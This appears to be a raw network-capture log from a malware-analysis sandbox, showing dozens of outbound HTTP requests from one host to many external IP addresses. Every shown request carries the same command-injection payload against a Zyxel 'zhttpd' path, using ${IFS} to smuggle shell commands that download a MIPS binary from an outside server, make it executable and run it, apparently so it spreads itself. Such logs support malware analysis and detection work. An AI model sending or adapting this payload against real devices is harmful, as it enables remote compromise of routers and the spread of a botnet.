                                                  Jan 19, 2024 18:24:14.423122883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8909192.168.2.1342148165.56.42.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423175097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8910192.168.2.1354766122.21.11.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423218966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8911192.168.2.135900848.214.245.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423249006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8912192.168.2.1354474165.101.205.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423296928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8913192.168.2.1341702185.171.31.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423326015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8914192.168.2.135794696.59.68.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423376083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8915192.168.2.1349238104.16.152.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423414946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8916192.168.2.1337602167.130.229.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423470974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8917192.168.2.1348110217.74.204.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423511982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8918192.168.2.134296264.234.191.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423563004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8919192.168.2.135619069.107.56.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423598051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8920192.168.2.1359882123.229.203.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423636913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8921192.168.2.1343522160.55.19.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423688889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8922192.168.2.1348120191.173.64.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423742056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8923192.168.2.133416851.151.84.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423785925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8924192.168.2.134395874.11.48.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423820019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8925192.168.2.1333872153.10.183.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423871994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8926192.168.2.13362224.227.199.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423929930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8927192.168.2.135429414.3.123.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423953056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8928192.168.2.1341280110.51.34.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.423995972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8929192.168.2.134365047.46.35.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424026966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8930192.168.2.133340888.220.68.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424052954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8931192.168.2.1350818213.239.143.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424108982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8932192.168.2.13523944.27.12.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424141884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8933192.168.2.134478654.66.16.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424174070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8934192.168.2.13415344.152.27.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424232960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8935192.168.2.1352188202.119.118.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424302101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8936192.168.2.1337844167.44.76.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424338102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8937192.168.2.1347902218.152.82.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424371004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8938192.168.2.1353758223.147.15.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424424887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8939192.168.2.133648877.24.15.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424465895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8940192.168.2.1334670222.197.202.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424489975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8941192.168.2.1344538164.228.147.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424547911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8942192.168.2.134594873.249.76.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424596071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8943192.168.2.135769281.72.252.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424628973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8944192.168.2.1342692195.228.172.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424668074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8945192.168.2.1342432189.0.145.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424735069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8946192.168.2.1359412130.174.9.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424776077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8947192.168.2.135213431.15.253.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424797058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8948192.168.2.1342236143.131.26.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424875975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8949192.168.2.1355564201.245.152.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.424897909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8950192.168.2.134853618.176.65.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425098896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8951192.168.2.135341845.213.85.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425100088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8952192.168.2.1352470200.169.125.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425098896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8953192.168.2.134092020.91.69.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425160885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8954192.168.2.1340822183.3.15.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425162077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8955192.168.2.133621086.13.37.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425168991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8956192.168.2.134275880.94.214.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425169945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8957192.168.2.134810487.243.114.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425168991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8958192.168.2.135423847.40.57.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425175905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8959192.168.2.1336102175.181.205.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425204039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8960192.168.2.1336898196.53.244.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425215960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8961192.168.2.136002867.97.192.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425236940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8962192.168.2.133352094.34.201.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425240993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8963192.168.2.1338864194.108.154.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425240040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8964192.168.2.1346548168.64.61.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425236940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8965192.168.2.135806277.128.141.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425301075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8966192.168.2.1342310116.65.0.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425321102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8967192.168.2.1342344105.178.159.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425388098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8968192.168.2.1333068201.37.182.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425432920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8969192.168.2.134103063.202.82.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425473928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8970192.168.2.135185643.25.48.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:14.425514936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8971192.168.2.133708265.65.66.39443
                                                  TimestampBytes transferredDirectionData
